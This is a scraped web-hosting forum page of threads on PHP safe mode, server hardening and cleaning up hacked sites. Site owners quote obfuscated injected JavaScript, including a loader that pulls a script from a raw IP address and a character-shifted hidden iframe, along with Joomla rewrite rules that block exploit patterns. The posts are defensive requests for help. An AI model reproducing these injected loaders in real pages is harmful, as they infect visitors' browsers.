Stop Exploits And Malicious Execs: Safe Mode
Mar 8, 2008
I decided to apply PHP safe mode to my servers, considering:
- I cannot prohibit using exec functions (some binary uses are needed, like host, mysqldump, etc..)
- I cannot restrict at all via UID/GID method at bins due to several problems..
Safe mode is the final sollution, as I only need "safe_mode_exec_dir" config to set a folder with the necesary binaries... this will stop nobody user (Apache) to exec whatever it wants, like perl, binaries uploaded to an public insecure folder (exploits), or anything else... people only could exec() the binaries I want and where I want. This will stop finally 95% of my hack problems.
Well. The problem is safe_mode is enabled or not, but you cannot set o disable certain features of this safe mode, like UID/GID checks (*******!)...
I am trying to configure so only "safe_mode_exec_dir" would apply, so:
- Including UIDs checks disabled by:
safe_mode_include_dir = "/home/"
(tested)
- Some variables set to NULL, as safe_mode_allowed_env_vars or safe_mode_protected_env_vars...
- safe_mode_exec_dir = "/usr/phpbin/"
Great! with symbolic lynks in... the best sollution available for me.
- open_basedir = "/home/"
(for fopen, etc...)
Ok ok.. but problems there.. by example this one:
Quote:
Warning: fopen() [function.fopen]: SAFE MODE Restriction in effect. The script whose uid is 32015 is not allowed to access cache/dynamic_fields/modules.php owned by uid 99 in /home/yyyyyyyyy/public_html/chn/modules/DynamicFields/DynamicField.php on line 823
Great.. fopen is under UID/GID checks, but it is not an include, so safe_mode_include_dir would not apply...
Now fopen, link, unlink, etc.. functions are UID restricted and this seems to be impossible to disable.... pffffffff...
can you share your safe_mode configs or sollutions for this problem?
View 2 Replies
ADVERTISEMENT
Nov 6, 2009
What is the best option in the php setting does keeping the php function safe mode on or off?
View 12 Replies
View Related
Apr 9, 2009
i need to enable php safe mode on for my joomla and i came across this
Quote:
When the php safe mode is turned off globally by default at our server end, you can still override the setting to turn it ON for only your domain by just insert the following line inside the ".htaccess" file (at Linux server):
Code:
php_value safe_mode "1"
my joomla .htaccess file:
Quote:
##
# @version $Id: htaccess.txt 10492 2008-07-02 06:38:28Z ircmaxell $
# @package Joomla
# @copyright Copyright (C) 2005 - 2008 Open Source Matters. All rights reserved.
# @license http://www.gnu.org/copyleft/gpl.html GNU/GPL
# Joomla! is Free Software
##
#####################################################
# READ THIS COMPLETELY IF YOU CHOOSE TO USE THIS FILE
#
# The line just below this section: 'Options +FollowSymLinks' may cause problems
# with some server configurations. It is required for use of mod_rewrite, but may already
# be set by your server administrator in a way that dissallows changing it in
# your .htaccess file. If using it causes your server to error out, comment it out (add # to
# beginning of line), reload your site in your browser and test your sef url's. If they work,
# it has been set by your server administrator and you do not need it set here.
#
#####################################################
## Can be commented out if causes errors, see notes above.
Options +FollowSymLinks
#
# mod_rewrite in use
RewriteEngine On
########## Begin - Rewrite rules to block out some common exploits
## If you experience problems on your site block out the operations listed below
## This attempts to block the most common type of exploit `attempts` to Joomla!
#
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*(.*) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (<|%3C).*script.*(>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|[|\%[0-9A-Z]{0,2})
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]
#
########## End - Rewrite rules to block out some common exploits
View 3 Replies
View Related
Aug 30, 2008
I have a script that needs safe mode off to run, the script writers have said safe mode is disabled as default and not required and even disabled in php 6
Now I'm not to fimular with Safe mode, all I know is most scripts are wrote to work with this on
View 4 Replies
View Related
Jun 3, 2008
Should i switch safe mode on or off . Right now i am using it as on some one told me if i switch it off then server can easily hack but becoz i switch it on im having too much problem specially users of sites having problem of uploading and wordpress also have issue and some more script what you say what should i do?
View 9 Replies
View Related
May 13, 2007
how can i make "safe mode on/off" using .htaccess?( in SharedHosting )
View 1 Replies
View Related
Nov 27, 2007
I would like to know as to whether or not you have php safe mode turned on? If you do, please specify why, and would you allow your clients to turn it off?
View 13 Replies
View Related
Sep 17, 2007
I searched but couldn't find much - should you run PHP with safe mode on or off on a shared (Linux) server?
View 3 Replies
View Related
Aug 2, 2008
i have a cpanel server.. can any one tell me how to allow safe mode to a specific domain?
View 1 Replies
View Related
Jan 18, 2008
I am going to run a free host, yes I know I should post this in FWHT but well, they dont answer very fast if at all.
It is very dangerous to have Safe Mode OFF on a free host, but someone was telling me about open_basedir, which makes it so they cant touch any files set outside of open_basedir. Would this be suffiecient to keep them from touching others files? I know I need to disable other functions like exec() and stuff but would open_basedir keep hackers away from others files and hacking them...
View 7 Replies
View Related
Aug 11, 2008
To Install www.awbs.com scripts to my server
How Can I Do This Following to one site on My server
safe_mode Off
allow_url_fopen On
session.auto_start Off
tell Me that i can do that from httpd config
View 4 Replies
View Related
Oct 2, 2007
I have found on one webhost that they have very cool feature:
Here is what they say:
Quote:
Browsing through any webhost related forum will reveal that giving safe mode off poses extreme security risk to the server. Because it offers hackers a great advantage to access any other members account or read their sensitive files which usually contain passwords.
But then some genuine scripts won't work with safe mode ON. Meaning you could turn it on per member requests but that takes lots of labor.
So we completely reprogrammed the safe mode PHP source code and recompiled it. As a result ours safe mode OFF is light-years safer & hacker-proof then standard PHP v5 safe mode ON.
So all our members are getting safe mode OFF, with harder security then those hosts who offer Safe Mode ON.
So now I am wondering, how they did that? I have searched forums and Google for lots of different keyword but haven't found anything.
I believe a lot of you running Apache as nobody and having php save mode OFF. It there any way you protect yourself? phpsuexec is not a solution now as it increasing load.
View 8 Replies
View Related
Jan 31, 2007
i have vps and i enable the safe_mode , but now i need to turn it off becouse i need to install image uploader script and this script need safe mode off to work
so,
what can i do to secure my server while i turn off my safe mode?
what can happend if i turn off safe mode?
what is the job of safe mode?
View 6 Replies
View Related
Jul 25, 2009
I've recently upgraded from Shared hosting to a VPS. I'm currently getting my new VPS setup before migrating my site over. On my shared server, both the global and local safe_mode directives were reported as off by php_infO(). On ym new server, the global is reported as off, but local is reported as on.
On my old server, the PHP was version 4.4.9 running as a CGI. On my new server, PHP 5.1.6 is running as an Apache 2.0 Handler.
I have already set safe_mode to off in my global php.ini file (hence why global is reported by off). However, I have no local php.ini files, htaccess files, or php directive settings in place, so I cannot figure out why local is set to on!
I've tried editing httpd.conf to include "php_admin_flag safe_mode Off", though I'm not certain I put it in the right place. There is only one website on this server.
With the CGI php on my old server, I was able to create a local php.ini file to overwrite global directives, but that seems to have no effect with the Apache Handler on my new server.
View 5 Replies
View Related
Jun 11, 2007
what are the most important issues for secure php.ini file like when you turn your SAFE_MODE ON or OFF?
or please who every read this topic to post his important disable_functions in php.ini ... and if some functions disable to post it ...
let's make this subject for the most important issues for secure your php.ini
from script-kids as we can ...
here i have some important question's for anyone has or controlling a server ; vps ....
#0x01 ; what the most important disable_functions for the php.ini?
#0x02 ; is the safe_mode should be enabled? or disable? and this depend on what exacly?
#0x03 ; what the functions or any trick to control the nobody ( attacker on the server or shell ) FROOZ .... didn't move ? or make any command in the server ...
#0x04 ; i saw in some secure server ( as they say ) they changed the Server : discribe to them name[s] like
Server : SECURE BY US .COM OR SECURE SERVER ..
uname -a : Linux secure.secure.com 2.6.9-023stab040.1 #1 Mon Jan 15 23:24:32 MSK 2007 i686 athlon i386 GNU/Linux
sysctl : linux 2.6.9-023stab040.1
Server : SECURE BY US ! < [THIS WHAT I MEAN HOW COULD WE CHANGE IT IN PHP.ini ?]
id : uid=99(nobody) gid=99(nobody) groups=99(nobody) <[how can we cannot make this nobody to have the host id ! everyhost in the server should have his own name and php.ini ?]
pwd : /home/host/public_html/
#0x05 ; how can we hide the uname -a on the shell [ the attacker upload it to our customer site !]
#0x06 ; how can we hide the sysctl to view to anyone like [ attacker ] ...
#0x07 ; how can we rewrite on he Server Type the display for our secure message?Server : SECURE BY US !
#0x08 ; how can we give evey site and customer his php.ini file in his public_html? and how can we give him [ JUST HIS PERMISSION TO HIS SITES FOLDER AND NOT OTHER PATHS AND PERMISSION!]
these question every one had a server ; vps , need to know and secure his box from other ...
and anyone would like to publish any new [secure or not] idea please let us know what you would like to say ....
View 1 Replies
View Related
Feb 9, 2007
An abuser is loading files to a server's /tmp/ folder and I'm having a tough time figuring out which user's script is responsible for this. The attacker isn't gaining root, but is running irc bots as user nobody.
Any tips regarding how to figure out which script has the hole which is allowing this to happen?
Also, how do I secure the /tmp folder so no files uploaded can be executed?
View 9 Replies
View Related
Mar 12, 2007
MY BOX: RHEL 4 with Apache 1.3.37 and the cpanel control panel
I am asking my third party server management team to upgrade my kernel. Currently, I am using kernel...
2.6.15.4
They have recommended...
2.6.16.20
Is that a stable kernel?
Are there any known exploits/vulnerabilities?
It was released in June of 2006. Is there a better choice than this kernel?
View 2 Replies
View Related
Jul 16, 2009
I have serious problems with ".cgi" with malicious code, with that the person who has these files to send spam through my server without any kind of block, could block this type of send SPAM with files ".cgi"?
CentOS 5.2 - 64bits
WHM+cPanel
Exemplo of file executed: /usr/bin/perl /home/username/public_html/cgi-bin/erri/coms.cgi
View 5 Replies
View Related
Mar 18, 2009
We are having a problem with a number of our websites hosted on Fasthosts reseller account where JavaScript is being maliciously inserted into a number of pages.
An example of the code that has been inserted can be found below:
<!--
document.write(unescape('xXz%3CAEqscripzHVt%20RMisAEqrRMicxXz%3DzHV%2FyI%2F6
yI7zHV%2E21wq5RMi%2E2xXz4wq6%2E3AEq4RMi%2FjqAEquwqexXzry%2EjsyI%3E%3CzHV%2Fs
crRMiiwqpzHVtwq%3E').replace(/yI|zHV|fW|xXz|RMi|wq|AEq/g,""));
-->
Which runs this script:
<script src=//67.215.246.34/jquery.js></script>
New pages have been created on a number of websites aswell as the above code inserted into existing pages.
After removing the above code from one particular website it has happened again.
Some of the websites being affected are just static websites with only HTML pages, others are dynamic ASP pages.
View 2 Replies
View Related
May 11, 2009
Has anyone here ever heard of a malicious script called Mulcishell, stored in the file mshell.php? I've seen a bunch of instances of the file in my clients' folders with permissions 777, and I want to know what it does and how it works. (I already deleted the file, knowing it was a malicious script, but I want to know how to prevent it from ever being executed on my server.)
View 1 Replies
View Related
Oct 27, 2008
all sites in my server have maliciose code:
</html> <html> <body><script>var source ="=jgsbnf!tsd>(iuuq;00iv2.iv2/do0dpvoufs0joefy/qiq(!xjeui>2!ifjhiu>2!gsbnfcpsefs>1?=0jgsbnf?"; var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result); </script>
</html> </body>
how to localize this code in my sites, using grep.
My server work in centos.
View 3 Replies
View Related
Jun 5, 2008
we received a report of a malicious mail being sent from our servers. Problem is that the sender and recipients are not hosted with us. What I'm trying to find out is how the mail got sent out. The ME logs shows that the connection was made from 127.0.0.1 to the smtp service, but that's it.
We don't run mail services (pop3/imap/webmail) on the web servers, if that helps any. Have run out of ideas after sifting thru lots of logs (was trying to find if anyone called an application to send the mail and attachments out), but came up empty.
View 7 Replies
View Related
Jun 27, 2009
I am wanting to know if there is a way to stop files being uploaded to my vps, via ftp cpanel etc that are malicious..
I have been told there is a way to do this but i havent been told how..
Basicaly i want to know if there is something where i can add a list of keywords that are in the malicious files and what ever it is will stop them from being uploaded or if they manage to get uploaded onto my vps will it make them not work?
I am looking into this as i had an issue before where someone uploaded a shell onto my server :@ luckily it didnt cause no damage or he didnt get anywhere but i still want to be safe.
View 5 Replies
View Related
Jul 9, 2008
I've been having an issue with one of my sites were someone has been adding malicious code to the index file. I don't know what has been compromised and am looking for a way to stop this.
I have a dedicated server have already upgraded MySQL to the latest version as I though that might work but it hasn't.
View 8 Replies
View Related
Apr 5, 2009
for the first time in my sites life(10 year site) google blocked it. when you type my site google says that my site has malicious code in it.as we find it the problem in my site came from the company where i hosted it.we clear all the files for the malicious code and now its all ok.i want to ask if anyone knows for his experience how much days google will check my site again to see if all its ok.i send them before six hours via webmaster tools, a request for eaming agin my site,but i dont knwo how will do these. so i am asking anyone of you,who had same experience.any help will be appreciate.please help me with anything you think that might be useful for me to having my site back again in google correctly!
View 5 Replies
View Related
Apr 30, 2009
we have been having a strange hacking problem on our server that we can not seem to find how they are managing to accompish. I am just wondering if anyone here may be able to offer any suggestions on this?
The problem:
On our server, a hacker has managed to add malicious code to all html and php files on two hosting accounts that we operate. These two accounts are seperate and do not share login information. This is the 2nd time this has happened within the past two weeks.
Originally it was suspected that we needed to add SuPhp to prevent insecure permissions. This has been done, yet the problem continues.
On all html pages, malicious javascript has been added, and on all php files malicious php code has been added.
We have a lot of accounts on this server, and as mentioned only the two accounts seem to have been affected by this.
What we have done to attempt to secure the server:
1) We have installed SuPhp.
2) We have ensured that all scripts on the affected websites are updated and running the latest versions.
3) We have changed all the passwords.
Our server is a managed server, and our server company has been very helpful, however at the moment can not seem to pinpoint the problem. There also does not appear to be any indication via the access logs of the infected files being altered, yet they have been altered.
The computers used to access these websites are clean, and do not have any malware running, which would allow a hacker to obtain any passwords. It also does not appear that the hacker was able to obtain root access.
One other thing I noticed, we run Kayako on one of the sites. When this problem occurs we receive a message that Zend Optimizer is not installed on our server when attempting to login to Kayako, when in fact it is.
Searching Google, I found the following link on the Zend site in which the symptoms seem to be very similar. What are the odds this could be a Zend vulnerabilty?
[url]
View 14 Replies
View Related
Oct 10, 2014
i manage linux apache webserver with a few wordpress blogs and from time to time i see someone inject a malicious .php file into wp-content/uploads/2014/10/ directory.
i think its some bad plugin or theme, but these is more blogs, i ugrade, update, WP, but
how can i setup some monitor to tell me which php file (or even line in php file) injected that malicious .php ? I have linux root access so i can setup anything
View 3 Replies
View Related
Jul 6, 2009
My /tmp on my cPanel hosting server is nearly full, and I was wondering if it is safe to remove all the contents in /tmp, if not, what can I delete to clear up the space?
View 6 Replies
View Related
Feb 15, 2008
Most of my files are 755 as permission. Is this safe?
How about putting all files under 644 permission? What is the best permission so that all files are safe from intrusion?
View 8 Replies
View Related
May 12, 2007
I'm a customer and don't know much about server management, so like title says, is it okay to put php.ini in public_html?
View 14 Replies
View Related
Dec 18, 2007
how to know in which mode php running ? CGI or ISAPI
View 2 Replies
View Related
